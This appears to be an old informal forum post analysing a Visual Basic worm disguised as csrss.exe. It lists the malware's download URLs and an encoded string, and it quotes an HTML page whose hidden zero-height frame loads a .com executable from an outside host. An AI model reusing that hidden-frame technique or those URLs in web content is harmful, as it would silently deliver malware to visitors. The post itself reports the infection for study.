I dont know if this qualifies as an Incident but...
I have found a couple of txt on 'a' windows desktop..
Generated by a csrss.exe executable
Reversing a little bit the vb thingy I found it downloads from here:

http://tjuegost.info/downloads.html

an encripted string (28/08/2008)

043143143147348345345048045148143148144349143040345.

using this that finally seams to be the following url: 

http://cfot-os.tk/   (nothing useful here http://samspade.org/whois/cfotos.tk)

 which tries to download (and execute?) a .com file called "miHermana.com" using this html

''' 
<html>
<head>
<title>cfotos.tk</title>
<meta name="description" content="cfotos.tk">
<meta name="keywords" content="cfotos.tk">
</head>
<frameset rows="*,0" framespacing="0" border="0" frameborder="NO">
<frame src="http://usuarios.lycos.es/nuevo8888/MiHermana.com" name="dot_tk_frame_content" scrolling="auto" noresize>
 </frameset>
<noframes>
<body>
</body>
</noframes>

</html>
'''

bah..
etc!
VisualBasicW32WORM